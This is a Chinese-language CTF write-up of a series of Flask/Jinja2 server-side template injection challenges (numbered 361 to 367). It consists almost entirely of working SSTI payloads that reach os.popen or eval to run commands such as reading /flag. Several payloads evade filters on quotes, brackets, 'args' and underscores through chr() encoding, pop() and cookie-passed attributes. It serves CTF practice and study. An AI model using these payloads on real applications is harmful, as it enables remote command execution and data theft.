361
没发现什么过滤,直接用burp跑了下
最后payload:{{().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
362
同361payload
363
简单fuzz下,过滤单双引号,get传参绕过的或者可以用bp把chr类跑出来也可以绕过
payload:{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__[request.args.arg1](request.args.arg2).read()}}&arg1=open&arg2=/flag
364
过滤了单双引号和args用chr绕过(想找个fuzz字典了,github没找到,用payload一个字符一个字符删fuzz到的。。。)
用这个payload fuzz出chr
{{().__class__.__base__.__subclasses__()[?].__init__.__globals__.__builtins__.chr}}
{% set chr = ().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__.chr %}{{().__class__.__base__.__subclasses__()[257].__init__.__globals__.popen(chr(119)%2bchr(104)%2bchr(111)%2bchr(97)%2bchr(109)%2bchr(105)).read()}}
用这个payload再FUZZ下,fuzz到132
最后payload为:
{%%20set%20chr%20=%20().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__.chr%20%}{{().__class__.__base__.__subclasses__()[132].__init__.__globals__.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}
365
跟上题差不多,fuzz出就比上一题又多过滤了个中括号,可以使用__getitem__和pop替代中括号,取列表的第n位
找chr:
{{().__class__.__base__.__subclasses__().pop(433).__init__.__globals__.__builtins__.chr}}
最后payload:
{%%20set%20chr%20=%20().__class__.__base__.__subclasses__().pop(433).__init__.__globals__.__builtins__.chr%20%}{{().__class__.__base__.__subclasses__().pop(132).__init__.__globals__.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}
366
又多过滤了个_可以使用十六进制编码绕过但是好像得需要引号。这题又好像fuzz不出chr函数。用request传参绕过的.
可以看看羽师傅之前写的关于ssti bypass的一篇博客
payload:
?name={{(wa1ki0g|attr(request.cookies.w1)|attr(request.cookies.w2)|attr(request.cookies.w3))(request.cookies.w4).eval(request.cookies.w5)}}
Cookie:w1=__init__;w2=__globals__;w3=__getitem__;w4=__builtins__;w5=__import__('os').popen('cat /flag').read()
367
payload同上